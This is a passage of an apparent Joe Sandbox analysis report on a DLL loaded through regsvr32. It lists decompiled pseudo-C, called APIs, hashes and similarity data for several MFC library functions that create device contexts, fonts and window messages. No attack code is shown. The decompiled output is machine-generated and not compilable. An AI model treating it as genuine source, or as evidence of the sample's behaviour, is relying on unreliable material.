                                                                                                                0x1002b4dd
                                                                                                                0x1002b4e1
                                                                                                                0x1002b4e3
                                                                                                                0x1002b4e8
                                                                                                                0x1002b4ea
                                                                                                                0x1002b4f1
                                                                                                                0x1002b4f8
                                                                                                                0x1002b4ff
                                                                                                                0x1002b504
                                                                                                                0x1002b505
                                                                                                                0x1002b50a
                                                                                                                0x1002b4f1
                                                                                                                0x1002b4e8
                                                                                                                0x1002b50b
                                                                                                                0x1002b50e
                                                                                                                0x00000000
                                                                                                                0x1002b4cf

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 1002B4AB
                                                                                                                • GetModuleHandleA.KERNEL32(?,100A594C,00000000,?), ref: 1002B576
                                                                                                                • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 1002B586
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressH_prolog3_HandleModuleProc
                                                                                                                • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                                • API String ID: 2418878492-2500072749
                                                                                                                • Opcode ID: 80343a24d9ad312cc0189bf1200974e93c016c673bca73313ab3d4f112bb6e1d
                                                                                                                • Instruction ID: 5b1ac1d8a87dcaac49d10090e8121a3023399b1f3b7fcdc41daf1712c1936ba1
                                                                                                                • Opcode Fuzzy Hash: 80343a24d9ad312cc0189bf1200974e93c016c673bca73313ab3d4f112bb6e1d
                                                                                                                • Instruction Fuzzy Hash: A6319E34A00A15DBDB15DFA4E881BED77F5EF08340F8100A8E905AF282DB79EE04CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000B32A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E1000B32A(void* __ebx, CHAR* __edi, void* __esi, void* __eflags) {
				intOrPtr _t30;
				void* _t32;
				void* _t35;
				DEVMODEA* _t36;
				CHAR** _t39;
				signed short _t48;
				signed short _t54;
				intOrPtr _t56;
				void* _t71;
				CHAR** _t72;
				signed short _t75;
				CHAR** _t76;
				struct HDC__* _t78;
				void* _t79;
				void* _t80;

				_t69 = __edi;
				_t52 = __ebx;
				E100476B6(0x1008ddcd, __ebx, __edi, __esi);
				 *0x100bb480(0x1c);
				 *((intOrPtr*)(_t79 - 0x14)) = 0;
				_t30 =  *((intOrPtr*)(_t79 + 8));
				 *((intOrPtr*)(_t79 - 4)) = 0;
				if(_t30 != 0) {
					_t54 =  *(_t30 + 0xa) & 0x0000ffff;
					__eflags = _t54;
					if(_t54 != 0) {
						_t75 = (_t54 & 0x0000ffff) + _t30;
						__eflags = _t75;
					} else {
						_t75 = 0;
					}
					_t56 = ( *(_t30 + 8) & 0x0000ffff) + _t30;
					_t52 = ( *(_t30 + 4) & 0x0000ffff) + _t30;
					_t71 = ( *(_t30 + 6) & 0x0000ffff) + _t30;
					__eflags = _t75;
					 *((intOrPtr*)(_t79 - 0x1c)) = _t56;
					if(__eflags != 0) {
						_t32 = ( *(_t75 + 0x46) & 0x0000ffff) + 0x9c;
						__eflags = _t32 - 0x400;
						if(__eflags > 0) {
							L11:
							_t34 = ( *(_t75 + 0x46) & 0x0000ffff) + 0x9c;
							__eflags = ( *(_t75 + 0x46) & 0x0000ffff) + 0x9c;
							_t57 = _t79 - 0x14;
							_t35 = L100012BC(_t52, _t79 - 0x14, 0, _t71, ( *(_t75 + 0x46) & 0x0000ffff) + 0x9c, _t34);
							L12:
							_t36 = E1000AC5A(_t57, _t35, _t75);
							_t56 =  *((intOrPtr*)(_t79 - 0x1c));
							 *(_t79 - 0x18) = _t36;
							L13:
							_push(_t56);
							_t76 = E1000B053(_t52, _t79 - 0x28, _t71, _t75, __eflags);
							_push(_t71);
							 *((char*)(_t79 - 4)) = 1;
							_t72 = E1000B053(_t52, _t79 - 0x20, _t71, _t76, __eflags);
							_push(_t52);
							 *((char*)(_t79 - 4)) = 2;
							_t39 = E1000B053(_t52, _t79 - 0x24, _t72, _t76, __eflags);
							_t69 =  *_t72;
							_t78 = CreateDCA( *_t39,  *_t72,  *_t76,  *(_t79 - 0x18));
							L100013E3( *((intOrPtr*)(_t79 - 0x24)) + 0xfffffff0, 0);
							L100013E3( *((intOrPtr*)(_t79 - 0x20)) + 0xfffffff0, 0);
							_t44 = L100013E3( *((intOrPtr*)(_t79 - 0x28)) + 0xfffffff0, 0);
							L2:
							L10001389(_t44, _t79 - 0x14);
							return E10047739(_t52, _t69, _t78);
						}
						_t48 = L10001492(_t52, 0, _t71, _t75, __eflags);
						__eflags = _t48;
						_t57 = _t32;
						if(_t48 == 0) {
							goto L11;
						}
						E10048380(( *(_t75 + 0x46) & 0x0000ffff) + 0x9c);
						_t35 = _t80;
						goto L12;
					}
					 *(_t79 - 0x18) = 0;
					goto L13;
				}
				_t78 = CreateDCA("DISPLAY", 0, 0, 0);
				goto L2;
			}


















                                                                                                                0x1000b32a
                                                                                                                0x1000b32a
                                                                                                                0x1000b331
                                                                                                                0x1000b336
                                                                                                                0x1000b33e
                                                                                                                0x1000b341
                                                                                                                0x1000b346
                                                                                                                0x1000b349
                                                                                                                0x1000b370
                                                                                                                0x1000b374
                                                                                                                0x1000b377
                                                                                                                0x1000b380
                                                                                                                0x1000b380
                                                                                                                0x1000b379
                                                                                                                0x1000b379
                                                                                                                0x1000b379
                                                                                                                0x1000b38e
                                                                                                                0x1000b390
                                                                                                                0x1000b392
                                                                                                                0x1000b394
                                                                                                                0x1000b396
                                                                                                                0x1000b399
                                                                                                                0x1000b3a4
                                                                                                                0x1000b3a9
                                                                                                                0x1000b3ae
                                                                                                                0x1000b3cd
                                                                                                                0x1000b3d1
                                                                                                                0x1000b3d1
                                                                                                                0x1000b3d7
                                                                                                                0x1000b3da
                                                                                                                0x1000b3df
                                                                                                                0x1000b3e1
                                                                                                                0x1000b3e6
                                                                                                                0x1000b3e9
                                                                                                                0x1000b3ec
                                                                                                                0x1000b3ec
                                                                                                                0x1000b3f5
                                                                                                                0x1000b3f7
                                                                                                                0x1000b3fb
                                                                                                                0x1000b404
                                                                                                                0x1000b406
                                                                                                                0x1000b40a
                                                                                                                0x1000b40e
                                                                                                                0x1000b418
                                                                                                                0x1000b42b
                                                                                                                0x1000b42d
                                                                                                                0x1000b438
                                                                                                                0x1000b443
                                                                                                                0x1000b35b
                                                                                                                0x1000b35e
                                                                                                                0x1000b36d
                                                                                                                0x1000b36d
                                                                                                                0x1000b3b1
                                                                                                                0x1000b3b6
                                                                                                                0x1000b3b8
                                                                                                                0x1000b3b9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000b3c4
                                                                                                                0x1000b3c9
                                                                                                                0x00000000
                                                                                                                0x1000b3c9
                                                                                                                0x1000b39b
                                                                                                                0x00000000
                                                                                                                0x1000b39b
                                                                                                                0x1000b359
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 1000B331
                                                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 1000B353
                                                                                                                • __alloca_probe_16.LIBCMT ref: 1000B3C4
                                                                                                                • CreateDCA.GDI32(?,?,?,?), ref: 1000B41F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create$H_prolog3___alloca_probe_16
                                                                                                                • String ID: DISPLAY
                                                                                                                • API String ID: 1675797461-865373369
                                                                                                                • Opcode ID: 9827bb6cd6178643bf86aa37fe2b8c033721bd6de136d3be4650f1a94324d876
                                                                                                                • Instruction ID: c7dea487c0f5ddc0058b127140378c40b3c3e8784b0faee1b94e8b47be7bb17c
                                                                                                                • Opcode Fuzzy Hash: 9827bb6cd6178643bf86aa37fe2b8c033721bd6de136d3be4650f1a94324d876
                                                                                                                • Instruction Fuzzy Hash: 8631C175C00524CBEB24DFA4C895AFEB7F0EF84394F254129F856A7296EA346E40C6A0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002BD4A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E1002BD4A(signed int __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t49;
				signed int _t60;
				signed int _t64;
				signed int _t67;
				signed int _t80;
				signed int _t86;
				intOrPtr* _t90;
				void* _t91;

				_t74 = __ebx;
				_push(0x80);
				E100476B6(0x10090176, __ebx, __edi, __esi);
				_t49 =  *((intOrPtr*)(_t91 + 8));
				_t90 = __ecx;
				 *((intOrPtr*)(_t91 - 0x50)) = 0;
				 *((intOrPtr*)(_t91 - 0x54)) = 0x1009d434;
				 *(_t91 - 4) = 0;
				if(_t49 == 0 ||  *(_t49 + 4) == 0) {
					if(E10001230(_t91 - 0x54, 0x11) != 0 || E10001230(_t91 - 0x54, 0xd) != 0) {
						_t49 = _t91 - 0x54;
						goto L6;
					} else {
						 *((intOrPtr*)(_t90 + 0x64)) = 0;
					}
				} else {
					L6:
					_t11 = _t49 + 4; // 0x1001e491
					GetObjectA( *_t11, 0x3c, _t91 - 0x4c);
					_push(_t91 - 0x30);
					 *(_t91 - 0x78) = 0x20;
					E1000B9D2(_t74, _t91 - 0x58, 0, _t90, __eflags);
					 *((intOrPtr*)(_t91 - 0x74)) =  *((intOrPtr*)(_t91 - 0x58));
					 *((short*)(_t91 - 0x68)) =  *((intOrPtr*)(_t91 - 0x3c));
					 *(_t91 - 0x66) =  *(_t91 - 0x35) & 0x000000ff;
					 *(_t91 - 0x64) =  *(_t91 - 0x38) & 0x000000ff;
					 *(_t91 - 0x60) =  *(_t91 - 0x37) & 0x000000ff;
					 *(_t91 - 0x5c) =  *(_t91 - 0x36) & 0x000000ff;
					_t60 =  *(_t91 - 0x4c);
					__eflags = _t60;
					 *(_t91 - 4) = 1;
					_t74 = _t60;
					if(__eflags < 0) {
						_t74 =  ~_t60;
					}
					L1000CDFE(_t74, _t91 - 0x8c, 0, _t90, __eflags);
					 *(_t91 - 4) = 2;
					_t80 = GetDeviceCaps( *(_t91 - 0x84), 0x5a);
					_t64 = _t74 * 0xafc80;
					asm("cdq");
					_t86 = _t64 % _t80;
					_t90 = _t90 + 0x64;
					 *((intOrPtr*)(_t91 - 0x6c)) = 0;
					 *(_t91 - 0x70) = _t64 / _t80;
					L10020F7B(_t90);
					_t67 = _t91 - 0x78;
					__imp__#420(_t67, 0x100a5fec, _t90,  *((intOrPtr*)(_t90 + 0x20)));
					__eflags = _t67;
					if(__eflags < 0) {
						 *_t90 = 0;
					}
					 *(_t91 - 4) = 1;
					L1000CE52(_t74, _t91 - 0x8c, 0, _t90, __eflags);
					__eflags =  *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0;
					L100013E3( *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0, _t86);
				}
				 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t91 - 0x54)) = 0x10098308;
				L1000CFF6(_t91 - 0x54);
				return E10047739(_t74, 0, _t90);
			}











                                                                                                                0x1002bd4a
                                                                                                                0x1002bd4a
                                                                                                                0x1002bd54
                                                                                                                0x1002bd59
                                                                                                                0x1002bd5e
                                                                                                                0x1002bd60
                                                                                                                0x1002bd63
                                                                                                                0x1002bd6c
                                                                                                                0x1002bd6f
                                                                                                                0x1002bd82
                                                                                                                0x1002bd9a
                                                                                                                0x00000000
                                                                                                                0x1002bd92
                                                                                                                0x1002bd92
                                                                                                                0x1002bd92
                                                                                                                0x1002bd9d
                                                                                                                0x1002bd9d
                                                                                                                0x1002bda3
                                                                                                                0x1002bda6
                                                                                                                0x1002bdaf
                                                                                                                0x1002bdb3
                                                                                                                0x1002bdba
                                                                                                                0x1002bdc2
                                                                                                                0x1002bdc9
                                                                                                                0x1002bdd2
                                                                                                                0x1002bdda
                                                                                                                0x1002bde1
                                                                                                                0x1002bde8
                                                                                                                0x1002bdeb
                                                                                                                0x1002bdee
                                                                                                                0x1002bdf0
                                                                                                                0x1002bdf4
                                                                                                                0x1002bdf6
                                                                                                                0x1002bdfa
                                                                                                                0x1002bdfa
                                                                                                                0x1002be05
                                                                                                                0x1002be12
                                                                                                                0x1002be1c
                                                                                                                0x1002be20
                                                                                                                0x1002be26
                                                                                                                0x1002be27
                                                                                                                0x1002be29
                                                                                                                0x1002be2d
                                                                                                                0x1002be30
                                                                                                                0x1002be33
                                                                                                                0x1002be3e
                                                                                                                0x1002be42
                                                                                                                0x1002be48
                                                                                                                0x1002be4a
                                                                                                                0x1002be4c
                                                                                                                0x1002be4c
                                                                                                                0x1002be54
                                                                                                                0x1002be58
                                                                                                                0x1002be60
                                                                                                                0x1002be63
                                                                                                                0x1002be63
                                                                                                                0x1002be68
                                                                                                                0x1002be6f
                                                                                                                0x1002be76
                                                                                                                0x1002be80

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 1002BD54
                                                                                                                • GetObjectA.GDI32(1001E491,0000003C,?), ref: 1002BDA6
                                                                                                                • GetDeviceCaps.GDI32(?,0000005A), ref: 1002BE16
                                                                                                                • OleCreateFontIndirect.OLEAUT32(00000020,100A5FEC), ref: 1002BE42
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                                • String ID:
                                                                                                                • API String ID: 2429671754-3916222277
                                                                                                                • Opcode ID: c40c12fe3be4be559ea53c661c0170e3f5bd0dd14fd6b9e177c80991e0598783
                                                                                                                • Instruction ID: 8110959a6e54c0f51d5823ab9e749c0ccfc70fdb1bbb8e213e6bcc0a527dad41
                                                                                                                • Opcode Fuzzy Hash: c40c12fe3be4be559ea53c661c0170e3f5bd0dd14fd6b9e177c80991e0598783
                                                                                                                • Instruction Fuzzy Hash: C74157349016899EDB14CFE4C941ADCFBF4FF19340F50816AE599EB296EBB49A04CB10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100361C3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100361C3(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t31;
				void* _t37;
				void* _t41;
				intOrPtr* _t43;
				void* _t44;
				int _t45;
				intOrPtr* _t48;
				void* _t49;

				_t42 = __ecx;
				_t48 = __ecx;
				_t41 = E10014BA7(__ecx);
				_t50 = _t41;
				if(_t41 == 0) {
					E1000A069(_t41, _t42, _t44, _t48, _t50);
				}
				_t43 =  *((intOrPtr*)(_t48 + 0x80));
				_t45 = _a4;
				if(_t43 == 0) {
					L4:
					if(_a8 != 0xffff) {
						__eflags = _t45;
						if(_t45 == 0) {
							L17:
							_t22 = _t48 + 0xa8;
							 *_t22 =  *(_t48 + 0xa8) & 0x00000000;
							__eflags =  *_t22;
							L18:
							_t24 = _t41 + 0x3c;
							 *_t24 =  *(_t41 + 0x3c) | 0x00000040;
							__eflags =  *_t24;
							L19:
							_t31 =  *(_t48 + 0xa8);
							if(_t31 ==  *((intOrPtr*)(_t48 + 0xac))) {
								goto L22;
							}
							_t31 = E10013FEA(_t41, _t43, _t49, GetParent( *(_t48 + 0x20)));
							if(_t31 == 0) {
								goto L22;
							}
							return PostMessageA( *(_t48 + 0x20), 0x36a, 0, 0);
						}
						__eflags = _a8 & 0x00000810;
						if((_a8 & 0x00000810) != 0) {
							goto L17;
						}
						__eflags = _t45 - 0xf000 - 0x1ef;
						if(_t45 - 0xf000 > 0x1ef) {
							__eflags = _t45 - 0xff00;
							if(_t45 < 0xff00) {
								L14:
								 *(_t48 + 0xa8) = _t45;
								goto L18;
							}
							 *(_t48 + 0xa8) = 0xef1f;
							goto L18;
						}
						_t45 = (_t45 + 0xffff1000 >> 4) + 0xef00;
						__eflags = _t45;
						goto L14;
					}
					 *(_t48 + 0x3c) =  *(_t48 + 0x3c) & 0xffffffbf;
					if( *((intOrPtr*)(_t41 + 0x68)) != 0) {
						 *(_t48 + 0xa8) = 0xe002;
					} else {
						 *(_t48 + 0xa8) = 0xe001;
					}
					SendMessageA( *(_t48 + 0x20), 0x362,  *(_t48 + 0xa8), 0);
					_t43 = _t48;
					_t37 =  *((intOrPtr*)( *_t48 + 0x154))();
					if(_t37 != 0) {
						UpdateWindow( *(_t37 + 0x20));
					}
					goto L19;
				} else {
					_t31 =  *((intOrPtr*)( *_t43 + 0x7c))(_t45, _a8, _a12);
					if(_t31 != 0) {
						L22:
						return _t31;
					}
					goto L4;
				}
			}















                                                                                                                0x100361c3
                                                                                                                0x100361c9
                                                                                                                0x100361d0
                                                                                                                0x100361d2
                                                                                                                0x100361d4
                                                                                                                0x100361d6
                                                                                                                0x100361d6
                                                                                                                0x100361db
                                                                                                                0x100361e3
                                                                                                                0x100361e6
                                                                                                                0x100361fc
                                                                                                                0x10036203
                                                                                                                0x10036254
                                                                                                                0x10036256
                                                                                                                0x10036298
                                                                                                                0x10036298
                                                                                                                0x10036298
                                                                                                                0x10036298
                                                                                                                0x1003629f
                                                                                                                0x1003629f
                                                                                                                0x1003629f
                                                                                                                0x1003629f
                                                                                                                0x100362a3
                                                                                                                0x100362a3
                                                                                                                0x100362af
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100362bb
                                                                                                                0x100362c2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100362d0
                                                                                                                0x10036258
                                                                                                                0x1003625e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10036266
                                                                                                                0x1003626b
                                                                                                                0x10036284
                                                                                                                0x1003628a
                                                                                                                0x1003627c
                                                                                                                0x1003627c
                                                                                                                0x00000000
                                                                                                                0x1003627c
                                                                                                                0x1003628c
                                                                                                                0x00000000
                                                                                                                0x1003628c
                                                                                                                0x10036276
                                                                                                                0x10036276
                                                                                                                0x00000000
                                                                                                                0x10036276
                                                                                                                0x10036205
                                                                                                                0x1003620d
                                                                                                                0x1003621b
                                                                                                                0x1003620f
                                                                                                                0x1003620f
                                                                                                                0x1003620f
                                                                                                                0x10036235
                                                                                                                0x1003623d
                                                                                                                0x1003623f
                                                                                                                0x10036247
                                                                                                                0x1003624c
                                                                                                                0x1003624c
                                                                                                                0x00000000
                                                                                                                0x100361e8
                                                                                                                0x100361f1
                                                                                                                0x100361f6
                                                                                                                0x100362da
                                                                                                                0x100362da
                                                                                                                0x100362da
                                                                                                                0x00000000
                                                                                                                0x100361f6

                                                                                                                APIs
                                                                                                                • SendMessageA.USER32 ref: 10036235
                                                                                                                • UpdateWindow.USER32 ref: 1003624C
                                                                                                                • GetParent.USER32(?), ref: 100362B4
                                                                                                                • PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 100362D0
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Exception@8H_prolog3ParentPostSendThrowUpdateWindow
                                                                                                                • String ID: @
                                                                                                                • API String ID: 33412044-2766056989
                                                                                                                • Opcode ID: e55ebaaaa6bcd21f69dba378561192110661c72613a9bde20aad739576272f48
                                                                                                                • Instruction ID: ee07a5994753447d1fba64953ed39fe2121cc4a9fa9f8d6d0d49d64af206bfb4
                                                                                                                • Opcode Fuzzy Hash: e55ebaaaa6bcd21f69dba378561192110661c72613a9bde20aad739576272f48
                                                                                                                • Instruction Fuzzy Hash: 7C31A231600F01AFE7619F20CC84B9B77E4FF49396F12C528E99A9E1A0CB71A8548B10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10037E19 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E10037E19(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t62;
				intOrPtr _t64;
				void* _t67;
				void* _t68;

				_t62 = __edx;
				_t52 = __ebx;
				_push(0x28);
				E100476B6(0x10090c8a, __ebx, __edi, __esi);
				_t64 =  *((intOrPtr*)(_t68 + 8));
				_t67 = __ecx;
				L1000140B(_t68 - 0x34, E100184C0());
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				if((E100177F8(__ecx) & 0x00004000) == 0) {
					_t56 = _t68 - 0x34;
					E1001069E(_t68 - 0x34, __ecx + 0xc4);
					if(_t64 != 0) {
						E1000B029(_t68 - 0x34, " - ");
						_t56 = _t68 - 0x34;
						E1000B029(_t68 - 0x34, _t64);
						_t38 =  *((intOrPtr*)(_t67 + 0x58));
						if( *((intOrPtr*)(_t67 + 0x58)) > 0) {
							E1004C19A(_t68 - 0x30, 0x20, ":%d", _t38);
							_t56 = _t68 - 0x34;
							E1000B029(_t68 - 0x34, _t68 - 0x30);
						}
					}
					L9:
					_t65 =  *((intOrPtr*)(_t68 - 0x34));
					E100219F5(_t56, _t62,  *((intOrPtr*)(_t67 + 0x20)),  *((intOrPtr*)(_t68 - 0x34)));
					L100013E3(_t65 - 0x10, _t62);
					return E10047739(_t52, _t65, _t67);
				}
				if(_t64 == 0) {
					L5:
					_t56 = _t68 - 0x34;
					E1001069E(_t68 - 0x34, _t67 + 0xc4);
					goto L9;
				}
				E1000B029(_t68 - 0x34, _t64);
				_t46 =  *((intOrPtr*)(_t67 + 0x58));
				if( *((intOrPtr*)(_t67 + 0x58)) > 0) {
					E1004C19A(_t68 - 0x30, 0x20, ":%d", _t46);
					E1000B029(_t68 - 0x34, _t68 - 0x30);
				}
				E1000B029(_t68 - 0x34, " - ");
				goto L5;
			}







                                                                                                                0x10037e19
                                                                                                                0x10037e19
                                                                                                                0x10037e19
                                                                                                                0x10037e20
                                                                                                                0x10037e25
                                                                                                                0x10037e28
                                                                                                                0x10037e33
                                                                                                                0x10037e38
                                                                                                                0x10037e47
                                                                                                                0x10037ea2
                                                                                                                0x10037ea5
                                                                                                                0x10037eac
                                                                                                                0x10037eb6
                                                                                                                0x10037ebc
                                                                                                                0x10037ebf
                                                                                                                0x10037ec4
                                                                                                                0x10037ec9
                                                                                                                0x10037ed7
                                                                                                                0x10037ee3
                                                                                                                0x10037ee6
                                                                                                                0x10037ee6
                                                                                                                0x10037ec9
                                                                                                                0x10037eeb
                                                                                                                0x10037eeb
                                                                                                                0x10037ef2
                                                                                                                0x10037efa
                                                                                                                0x10037f04
                                                                                                                0x10037f04
                                                                                                                0x10037e4b
                                                                                                                0x10037e8a
                                                                                                                0x10037e91
                                                                                                                0x10037e94
                                                                                                                0x00000000
                                                                                                                0x10037e94
                                                                                                                0x10037e51
                                                                                                                0x10037e56
                                                                                                                0x10037e5b
                                                                                                                0x10037e69
                                                                                                                0x10037e78
                                                                                                                0x10037e78
                                                                                                                0x10037e85
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 10037E20
                                                                                                                  • Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803
                                                                                                                • _swprintf.LIBCMT ref: 10037E69
                                                                                                                  • Part of subcall function 1004C19A: __vsprintf_s_l.LIBCMT ref: 1004C1AD
                                                                                                                  • Part of subcall function 1000B029: _strlen.LIBCMT ref: 1000B03A
                                                                                                                • _swprintf.LIBCMT ref: 10037ED7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
